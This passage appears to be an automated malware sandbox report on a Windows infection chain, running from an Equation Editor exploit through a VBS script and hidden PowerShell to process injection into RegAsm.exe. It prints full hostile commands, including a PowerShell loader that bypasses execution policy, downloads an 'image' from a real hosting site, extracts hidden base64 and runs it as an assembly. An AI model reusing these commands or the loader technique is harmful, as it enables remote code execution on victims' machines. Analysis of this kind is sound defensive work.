            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040783C FindFirstFileW,FindNextFileW,17_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407C97
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_17-49199
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004432B5 mov eax, dword ptr fs:[00000030h]17_2_004432B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00412077 GetProcessHeap,HeapFree,17_2_00412077
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434B47 SetUnhandledExceptionFilter,17_2_00434B47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043BB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00434FDC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3508, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Bypasses PowerShell execution policy
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
            Injects a PE file into a foreign processes
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe17_2_004120F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00419627 mouse_event,17_2_00419627
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhd
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ewh/005001/451.871.64.891//:ptth' , '1' , 'c:\programdata\' , 'incontrovertido','regasm',''))} }"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtref